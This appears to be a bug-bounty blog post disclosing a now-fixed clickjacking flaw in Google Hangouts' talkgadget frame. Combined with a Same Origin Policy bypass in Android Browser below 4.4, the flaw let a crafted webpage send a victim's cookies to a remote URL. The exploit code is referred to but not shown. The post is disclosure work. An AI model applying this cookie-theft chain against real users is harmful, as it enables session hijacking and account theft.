Bug Type: Clickjacking Vulnerability
Browser: Android Browser
Vulnerable Module: Google Talkgadget / Hangouts
Url : https://talkgadget.google.com
Vulnerable Browser/users: Android < 4.4
Status :Fixed .
Hello world 🙂 , I really hope you guys are doing great . Its been a long time , i could not post stuff . This post is about a clickjacking vulnerablity i found in one of the google service , that is Google Hangouts .It was reported last year . Today i got the mail of the permanent fix by them. The vulnerable url was
[pastacode lang=”markup” manual=”https%3A%2F%2Ftalkgadget.google.com%2Fu%2F0%2Ftalkgadget%2F_%2Fframe%3Fhl%3Den%23p%20(fixed)” message=”” highlight=”” provider=”manual”/]
Its always a tricky cum technical part, how you extract content from the vulnerable page/domain by exploiting a clickjacking vulnerability . So , to exploit this vulnerability i used the research of Mr. Rafay Baloch on Android Browser Same Origin Policy Bypass < 4.4 . This research confirms the SOP ( Same Origin Policy ) bypass in Android Browsers < 4.4 version . I would like to thank Mr Rafay for the permission to use his research in this exploit building .
I made the final webpage which contains the following code
All you need to do is send the above crafted webpage url to the victim , No user interaction required . Once the victim open the page on their vulnerable android browser , it will send their cookies to the remote url and redirect the user to google .
I have made a Video POC with all the explanation
I would like to thank Eduardo from Google for handling the report and yea it was really nice to meet you and all other respected seniors of google security team members ( Michele , Josh , Chris , Kotowicz ) at NullCon .
Thank you so much google for the reward